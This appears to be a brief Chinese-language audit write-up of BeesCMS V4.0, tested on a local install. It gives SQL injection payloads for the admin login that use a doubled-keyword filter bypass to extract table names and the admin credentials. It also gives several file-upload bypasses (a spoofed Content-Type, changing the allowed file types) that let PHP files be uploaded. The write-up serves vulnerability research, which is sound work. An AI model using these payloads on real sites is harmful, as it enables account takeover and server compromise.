Beescms V4.0审计
beescms
前台管理登录界面注入
http://127.0.0.1/beescms/admin/login.php
1 | function fl_html($str){ |
1 | function fl_value($str){ |
1 | $user=fl_html(fl_value($_POST['user'])); |
//爆破库名
1 | admin'and extractvalue(1,concat(0x7e,select database(),0x7e))# |
//利用双写+空格绕过过滤
//爆破表名
1 | admin' a and nd extractvalue(1,concat(0x7e,(selselectect table_name fr from om information_schema.tables wh where ere table_schema like 'beescms' limit 0,1),0x7e))# |
//爆破列名
1 | admin' a and nd extractvalue(1,concat(0x7e,(selselectect column_name fr from om information_schema.columns wh where ere table_name like 'bees_admin' limit 0,1),0x7e))# |
//爆破admin账户名:admin
1 | admin' a and nd extractvalue(1,concat(0x7e,(selselectect admin_name fr from om beescms.bees_admin limit 0,1),0x7e))# |
//结合substr全部爆破密码
1 | admin' a and nd extractvalue(1,concat(0x7e,substr((selselectect admin_password fr from om beescms.bees_admin limit 0,1),3,32),0x7e))# |
//21232f297a57a5a743894a0e4a801fc3很明显的md5函数处理:admin
后台文件上传1
mime类型绕过
http://127.0.0.1/beescms/admin/admin_pic_upload.php
1 | $value_arr=up_img($pic_info,$is_up_size,array('image/gif','image/jpeg','image/png','image/jpg','image/bmp','image/pjpeg','image/x-png'),$up_is_thumb,$up_thumb_width,$up_thumb_height,$logo=1,$pic_name_alt); |
只对Content-Type: 进行了对比
所以修改Content-Type: 即可进行文件上传绕过
Content-Disposition: form-data; name=”up[]”; filename=”1.php”
Content-Type: image/png
后台文件上传2
同样是mime类型绕过
up_img()函数
http://127.0.0.1/beescms/admin/upload.php
后台文件上传3
http://127.0.0.1/beescms/admin/admin_sys.php
修改允许上传文件类型
添加一个php类型
然后
http://127.0.0.1/beescms/admin/admin_file_upload.php
即可上传php文件